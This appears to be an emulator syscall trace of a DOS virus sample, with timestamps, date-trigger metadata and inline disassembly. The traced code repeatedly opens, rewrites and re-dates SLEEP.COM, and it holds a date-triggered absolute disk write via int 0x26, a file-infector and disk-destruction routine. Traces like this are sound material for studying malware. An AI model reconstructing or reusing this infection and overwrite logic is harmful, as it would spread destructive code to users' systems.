2018-12-25T12:39:35.111248067Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:35.115674129Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:35.119125043Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:35.122777053Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:35.124536298Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:35.127102353Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:35.140152058Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:35.142849076Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:35.144712043Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:35.15337102Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:35.163469362Z	42	PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606 0x12b70: je 0x12b75 0x12b72: jmp 0x12d8c 0x12b75: jmp 0x12d21 0x12b78: and ah, bh 0x12b7a: movsw word ptr es:[di], word ptr [si] 0x12b7b: mov ax, 0x5c4c 0x12b7e: add word ptr [di], ax 0x12b80: add byte ptr [di - 0x75], dl 0x12b83: in al, dx 0x12b84: sub sp, 0x2c 0x12b87: push si 0x12b88: jmp 0x12bf9 0x12b8a: mov ah, 0x1a 0x12b8c: lea dx, word ptr [bp - 0x2c] 0x12b8f: int 0x21 0x12b91: mov ah, 0x4e 0x12b93: mov cx, 0x10 0x12b96: mov dx, 0x1b5 0x12b99: add dx, word ptr [0x106]
2018-12-25T12:39:35.165492104Z	59	PC: 12d97 | Change current directory
2018-12-25T12:39:35.169245541Z	59	PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":13945,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:39:35.365657799Z	42	PC: 12a5a | Get date 0x12a5a: cmp dl, 2 0x12a5d: je 0x12a61 0x12a5f: jmp 0x12a7e 0x12a61: cli 0x12a62: mov ah, 2 0x12a64: cdq 0x12a65: mov cx, 0x100 0x12a68: int 0x26 0x12a6a: jmp 0x12a6c 0x12a6c: cli 0x12a6d: mov al, 3 0x12a6f: mov cx, 0x2bc 0x12a72: mov dx, 0 0x12a75: mov ds, word ptr [di + 0x63] 0x12a78: mov bx, word ptr [di + 0x37] 0x12a7b: call 0x22a61 0x12a7e: ret 0x12a7f: lodsb al, byte ptr [si] 0x12a80: xor al, ah 0x12a82: stosb byte ptr es:[di], al
2018-12-25T12:39:35.369175182Z	71	PC: 12b46 | Get current directory
2018-12-25T12:39:35.3722129Z	59	PC: 12b51 | Change current directory
2018-12-25T12:39:35.376718191Z	26	PC: 12c04 | Set disk transfer address
2018-12-25T12:39:35.378108979Z	78	PC: 12c12 | Find first file
2018-12-25T12:39:35.385273557Z	61	PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:35.392508486Z	63	PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:39:35.399947619Z	44	PC: 12c88 | Get time 0x12c88: add dl, dh 0x12c8a: je 0x12c84 0x12c8c: mov si, 0x115 0x12c8f: add si, word ptr [0x106] 0x12c93: mov byte ptr [si], dl 0x12c95: mov ax, 0x4301 0x12c98: xor cx, cx 0x12c9a: mov dx, si 0x12c9c: add dx, 0xc7 0x12ca0: int 0x21 0x12ca2: mov ah, 0x3e 0x12ca4: int 0x21 0x12ca6: mov ax, 0x3d02 0x12ca9: int 0x21 0x12cab: jb 0x12c5e 0x12cad: mov di, dx 0x12caf: add di, 0x63 0x12cb2: stosw word ptr es:[di], ax 0x12cb3: xchg ax, bx 0x12cb4: mov ah, 0x40
2018-12-25T12:39:35.403448497Z	67	PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:35.42487994Z	62	PC: 12ca6 | Close file
2018-12-25T12:39:35.42680484Z	61	PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:35.434907439Z	64	PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:35.442360098Z	64	PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:35.445217203Z	64	PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:35.448573353Z	66	PC: 12cee | Move file pointer
2018-12-25T12:39:35.450484156Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:35.453111698Z	64	PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:35.462707633Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:35.465620655Z	87	PC: 12d07 | Get or set file date and time
2018-12-25T12:39:35.46699651Z	62	PC: 12d0b | Close file
2018-12-25T12:39:35.475151615Z	67	PC: 12d1c | Get or set file attributes
2018-12-25T12:39:35.486904909Z	79	PC: 12c25 | Find next file
2018-12-25T12:39:35.489816664Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:35.496933413Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:35.50501802Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:35.507688555Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:35.519263802Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:35.522133905Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:35.529518961Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:35.532830472Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:35.536278944Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:35.539461631Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:35.541290337Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:35.543782154Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:35.553334775Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:35.555083492Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:35.556233097Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:35.562145555Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:35.57017983Z	79	PC: 12c25 | Find next file (See above)
2018-12-25T12:39:35.572930816Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:35.5805748Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:35.588103468Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:35.59077914Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:35.602229194Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:35.604194615Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:35.617356199Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:35.625487906Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:35.628580916Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:35.63170729Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:35.634414949Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:35.637155363Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:35.646917271Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:35.650610861Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:35.65312263Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:35.661939881Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:35.673182519Z	42	PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606 0x12b70: je 0x12b75 0x12b72: jmp 0x12d8c 0x12b75: jmp 0x12d21 0x12b78: and ah, bh 0x12b7a: movsw word ptr es:[di], word ptr [si] 0x12b7b: mov ax, 0x5c4c 0x12b7e: add word ptr [di], ax 0x12b80: add byte ptr [di - 0x75], dl 0x12b83: in al, dx 0x12b84: sub sp, 0x2c 0x12b87: push si 0x12b88: jmp 0x12bf9 0x12b8a: mov ah, 0x1a 0x12b8c: lea dx, word ptr [bp - 0x2c] 0x12b8f: int 0x21 0x12b91: mov ah, 0x4e 0x12b93: mov cx, 0x10 0x12b96: mov dx, 0x1b5 0x12b99: add dx, word ptr [0x106]
2018-12-25T12:39:35.6765454Z	59	PC: 12d97 | Change current directory
2018-12-25T12:39:35.681684099Z	59	PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":13945,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:39:35.810805679Z	42	PC: 12a5a | Get date 0x12a5a: cmp dl, 2 0x12a5d: je 0x12a61 0x12a5f: jmp 0x12a7e 0x12a61: cli 0x12a62: mov ah, 2 0x12a64: cdq 0x12a65: mov cx, 0x100 0x12a68: int 0x26 0x12a6a: jmp 0x12a6c 0x12a6c: cli 0x12a6d: mov al, 3 0x12a6f: mov cx, 0x2bc 0x12a72: mov dx, 0 0x12a75: mov ds, word ptr [di + 0x63] 0x12a78: mov bx, word ptr [di + 0x37] 0x12a7b: call 0x22a61 0x12a7e: ret 0x12a7f: lodsb al, byte ptr [si] 0x12a80: xor al, ah 0x12a82: stosb byte ptr es:[di], al
2018-12-25T12:39:35.813818758Z	71	PC: 12b46 | Get current directory
2018-12-25T12:39:35.816986805Z	59	PC: 12b51 | Change current directory
2018-12-25T12:39:35.821328075Z	26	PC: 12c04 | Set disk transfer address
2018-12-25T12:39:35.822509772Z	78	PC: 12c12 | Find first file
2018-12-25T12:39:35.830064078Z	61	PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:35.837876657Z	63	PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:39:35.845197598Z	44	PC: 12c88 | Get time 0x12c88: add dl, dh 0x12c8a: je 0x12c84 0x12c8c: mov si, 0x115 0x12c8f: add si, word ptr [0x106] 0x12c93: mov byte ptr [si], dl 0x12c95: mov ax, 0x4301 0x12c98: xor cx, cx 0x12c9a: mov dx, si 0x12c9c: add dx, 0xc7 0x12ca0: int 0x21 0x12ca2: mov ah, 0x3e 0x12ca4: int 0x21 0x12ca6: mov ax, 0x3d02 0x12ca9: int 0x21 0x12cab: jb 0x12c5e 0x12cad: mov di, dx 0x12caf: add di, 0x63 0x12cb2: stosw word ptr es:[di], ax 0x12cb3: xchg ax, bx 0x12cb4: mov ah, 0x40
2018-12-25T12:39:35.848763737Z	67	PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:35.870332308Z	62	PC: 12ca6 | Close file
2018-12-25T12:39:35.872934469Z	61	PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:35.8817961Z	64	PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:35.889515775Z	64	PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:35.892792617Z	64	PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:35.896697173Z	66	PC: 12cee | Move file pointer
2018-12-25T12:39:35.898504911Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:35.904810189Z	64	PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:35.91511685Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:35.917502412Z	87	PC: 12d07 | Get or set file date and time
2018-12-25T12:39:35.91902148Z	62	PC: 12d0b | Close file
2018-12-25T12:39:35.942025072Z	67	PC: 12d1c | Get or set file attributes
2018-12-25T12:39:35.953989364Z	79	PC: 12c25 | Find next file
2018-12-25T12:39:35.957167093Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:35.968509406Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:35.975850676Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:35.978449071Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:35.989511555Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:35.991779178Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:35.999127766Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:36.002111332Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:36.006558442Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:36.009541549Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:36.011160775Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:36.014391383Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:36.024849694Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:36.027448083Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:36.030284815Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:36.040280801Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:36.051490926Z	79	PC: 12c25 | Find next file (See above)
2018-12-25T12:39:36.055989464Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:36.064098931Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:36.07173741Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:36.075805444Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:36.087516555Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:36.089931221Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:36.098137636Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:36.102066883Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:36.105273719Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:36.108668909Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:36.111437281Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:36.114432527Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:36.124440104Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:36.127625369Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:36.129706473Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:36.14049012Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:36.153169576Z	42	PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606 0x12b70: je 0x12b75 0x12b72: jmp 0x12d8c 0x12b75: jmp 0x12d21 0x12b78: and ah, bh 0x12b7a: movsw word ptr es:[di], word ptr [si] 0x12b7b: mov ax, 0x5c4c 0x12b7e: add word ptr [di], ax 0x12b80: add byte ptr [di - 0x75], dl 0x12b83: in al, dx 0x12b84: sub sp, 0x2c 0x12b87: push si 0x12b88: jmp 0x12bf9 0x12b8a: mov ah, 0x1a 0x12b8c: lea dx, word ptr [bp - 0x2c] 0x12b8f: int 0x21 0x12b91: mov ah, 0x4e 0x12b93: mov cx, 0x10 0x12b96: mov dx, 0x1b5 0x12b99: add dx, word ptr [0x106]
2018-12-25T12:39:36.155661826Z	59	PC: 12d97 | Change current directory
2018-12-25T12:39:36.160263516Z	59	PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":13945,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:39:37.132208658Z	42	PC: 12a5a | Get date 0x12a5a: cmp dl, 2 0x12a5d: je 0x12a61 0x12a5f: jmp 0x12a7e 0x12a61: cli 0x12a62: mov ah, 2 0x12a64: cdq 0x12a65: mov cx, 0x100 0x12a68: int 0x26 0x12a6a: jmp 0x12a6c 0x12a6c: cli 0x12a6d: mov al, 3 0x12a6f: mov cx, 0x2bc 0x12a72: mov dx, 0 0x12a75: mov ds, word ptr [di + 0x63] 0x12a78: mov bx, word ptr [di + 0x37] 0x12a7b: call 0x22a61 0x12a7e: ret 0x12a7f: lodsb al, byte ptr [si] 0x12a80: xor al, ah 0x12a82: stosb byte ptr es:[di], al
2018-12-25T12:39:37.134884248Z	71	PC: 12b46 | Get current directory
2018-12-25T12:39:37.13865276Z	59	PC: 12b51 | Change current directory
2018-12-25T12:39:37.143021912Z	26	PC: 12c04 | Set disk transfer address
2018-12-25T12:39:37.144201947Z	78	PC: 12c12 | Find first file
2018-12-25T12:39:37.151866067Z	61	PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:37.159335516Z	63	PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:39:37.166341159Z	44	PC: 12c88 | Get time 0x12c88: add dl, dh 0x12c8a: je 0x12c84 0x12c8c: mov si, 0x115 0x12c8f: add si, word ptr [0x106] 0x12c93: mov byte ptr [si], dl 0x12c95: mov ax, 0x4301 0x12c98: xor cx, cx 0x12c9a: mov dx, si 0x12c9c: add dx, 0xc7 0x12ca0: int 0x21 0x12ca2: mov ah, 0x3e 0x12ca4: int 0x21 0x12ca6: mov ax, 0x3d02 0x12ca9: int 0x21 0x12cab: jb 0x12c5e 0x12cad: mov di, dx 0x12caf: add di, 0x63 0x12cb2: stosw word ptr es:[di], ax 0x12cb3: xchg ax, bx 0x12cb4: mov ah, 0x40
2018-12-25T12:39:37.169684453Z	67	PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:37.193554832Z	62	PC: 12ca6 | Close file
2018-12-25T12:39:37.197937023Z	61	PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:37.206030476Z	64	PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:37.210745792Z	64	PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:37.212770542Z	64	PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:37.216193195Z	66	PC: 12cee | Move file pointer
2018-12-25T12:39:37.218679991Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.221497658Z	64	PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:37.230878295Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.234231089Z	87	PC: 12d07 | Get or set file date and time
2018-12-25T12:39:37.235807598Z	62	PC: 12d0b | Close file
2018-12-25T12:39:37.244260478Z	67	PC: 12d1c | Get or set file attributes
2018-12-25T12:39:37.260147071Z	79	PC: 12c25 | Find next file
2018-12-25T12:39:37.263182782Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:37.270176165Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:37.277806294Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:37.280244764Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:37.290994505Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:37.293439852Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:37.300610217Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:37.303566364Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:37.307159573Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:37.310659283Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:37.313180068Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.316537083Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:37.326794538Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.329303681Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:37.330996912Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:37.339951491Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:37.35083188Z	79	PC: 12c25 | Find next file (See above)
2018-12-25T12:39:37.353896581Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:37.36225698Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:37.369646227Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:37.372112495Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:37.384359201Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:37.386357901Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:37.394389774Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:37.398014814Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:37.399870191Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:37.401638721Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:37.402821276Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.404765359Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:37.410478512Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.412057135Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:37.413312904Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:37.418522757Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:37.429259833Z	42	PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606 0x12b70: je 0x12b75 0x12b72: jmp 0x12d8c 0x12b75: jmp 0x12d21 0x12b78: and ah, bh 0x12b7a: movsw word ptr es:[di], word ptr [si] 0x12b7b: mov ax, 0x5c4c 0x12b7e: add word ptr [di], ax 0x12b80: add byte ptr [di - 0x75], dl 0x12b83: in al, dx 0x12b84: sub sp, 0x2c 0x12b87: push si 0x12b88: jmp 0x12bf9 0x12b8a: mov ah, 0x1a 0x12b8c: lea dx, word ptr [bp - 0x2c] 0x12b8f: int 0x21 0x12b91: mov ah, 0x4e 0x12b93: mov cx, 0x10 0x12b96: mov dx, 0x1b5 0x12b99: add dx, word ptr [0x106]
2018-12-25T12:39:37.4319161Z	59	PC: 12d97 | Change current directory
2018-12-25T12:39:37.436208517Z	59	PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":13945,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:39:37.460341106Z	42	PC: 12a5a | Get date 0x12a5a: cmp dl, 2 0x12a5d: je 0x12a61 0x12a5f: jmp 0x12a7e 0x12a61: cli 0x12a62: mov ah, 2 0x12a64: cdq 0x12a65: mov cx, 0x100 0x12a68: int 0x26 0x12a6a: jmp 0x12a6c 0x12a6c: cli 0x12a6d: mov al, 3 0x12a6f: mov cx, 0x2bc 0x12a72: mov dx, 0 0x12a75: mov ds, word ptr [di + 0x63] 0x12a78: mov bx, word ptr [di + 0x37] 0x12a7b: call 0x22a61 0x12a7e: ret 0x12a7f: lodsb al, byte ptr [si] 0x12a80: xor al, ah 0x12a82: stosb byte ptr es:[di], al
2018-12-25T12:39:37.463615127Z	71	PC: 12b46 | Get current directory
2018-12-25T12:39:37.466455561Z	59	PC: 12b51 | Change current directory
2018-12-25T12:39:37.470376388Z	26	PC: 12c04 | Set disk transfer address
2018-12-25T12:39:37.471999798Z	78	PC: 12c12 | Find first file
2018-12-25T12:39:37.484013938Z	61	PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:37.491217099Z	63	PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:39:37.498464182Z	44	PC: 12c88 | Get time 0x12c88: add dl, dh 0x12c8a: je 0x12c84 0x12c8c: mov si, 0x115 0x12c8f: add si, word ptr [0x106] 0x12c93: mov byte ptr [si], dl 0x12c95: mov ax, 0x4301 0x12c98: xor cx, cx 0x12c9a: mov dx, si 0x12c9c: add dx, 0xc7 0x12ca0: int 0x21 0x12ca2: mov ah, 0x3e 0x12ca4: int 0x21 0x12ca6: mov ax, 0x3d02 0x12ca9: int 0x21 0x12cab: jb 0x12c5e 0x12cad: mov di, dx 0x12caf: add di, 0x63 0x12cb2: stosw word ptr es:[di], ax 0x12cb3: xchg ax, bx 0x12cb4: mov ah, 0x40
2018-12-25T12:39:37.500687002Z	67	PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:37.517919054Z	62	PC: 12ca6 | Close file
2018-12-25T12:39:37.520297207Z	61	PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:37.527135889Z	64	PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:37.530037861Z	64	PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:37.532997674Z	64	PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:37.536043539Z	66	PC: 12cee | Move file pointer
2018-12-25T12:39:37.537629732Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.539919513Z	64	PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:37.550146158Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.552471781Z	87	PC: 12d07 | Get or set file date and time
2018-12-25T12:39:37.554113458Z	62	PC: 12d0b | Close file
2018-12-25T12:39:37.562738609Z	67	PC: 12d1c | Get or set file attributes
2018-12-25T12:39:37.572337428Z	79	PC: 12c25 | Find next file
2018-12-25T12:39:37.574835862Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:37.582432648Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:37.592814671Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:37.595270169Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:37.608159468Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:37.609937913Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:37.616573458Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:37.620075943Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:37.62293628Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:37.625493927Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:37.62714145Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.63093386Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:37.640040986Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.642676895Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:37.645211907Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:37.653078903Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:37.663094201Z	79	PC: 12c25 | Find next file (See above)
2018-12-25T12:39:37.666547973Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:37.673108991Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:37.679574222Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:37.682424057Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:37.691990091Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:37.693463314Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:37.70118223Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:37.703807417Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:37.706257304Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:37.709404011Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:37.710724638Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.712726419Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:37.721263289Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.724117195Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:37.725586716Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:37.733104927Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:37.743748878Z	42	PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606 0x12b70: je 0x12b75 0x12b72: jmp 0x12d8c 0x12b75: jmp 0x12d21 0x12b78: and ah, bh 0x12b7a: movsw word ptr es:[di], word ptr [si] 0x12b7b: mov ax, 0x5c4c 0x12b7e: add word ptr [di], ax 0x12b80: add byte ptr [di - 0x75], dl 0x12b83: in al, dx 0x12b84: sub sp, 0x2c 0x12b87: push si 0x12b88: jmp 0x12bf9 0x12b8a: mov ah, 0x1a 0x12b8c: lea dx, word ptr [bp - 0x2c] 0x12b8f: int 0x21 0x12b91: mov ah, 0x4e 0x12b93: mov cx, 0x10 0x12b96: mov dx, 0x1b5 0x12b99: add dx, word ptr [0x106]
2018-12-25T12:39:37.746059077Z	59	PC: 12d97 | Change current directory
2018-12-25T12:39:37.750134911Z	59	PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":13945,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:39:37.536086068Z	42	PC: 12a5a | Get date 0x12a5a: cmp dl, 2 0x12a5d: je 0x12a61 0x12a5f: jmp 0x12a7e 0x12a61: cli 0x12a62: mov ah, 2 0x12a64: cdq 0x12a65: mov cx, 0x100 0x12a68: int 0x26 0x12a6a: jmp 0x12a6c 0x12a6c: cli 0x12a6d: mov al, 3 0x12a6f: mov cx, 0x2bc 0x12a72: mov dx, 0 0x12a75: mov ds, word ptr [di + 0x63] 0x12a78: mov bx, word ptr [di + 0x37] 0x12a7b: call 0x22a61 0x12a7e: ret 0x12a7f: lodsb al, byte ptr [si] 0x12a80: xor al, ah 0x12a82: stosb byte ptr es:[di], al
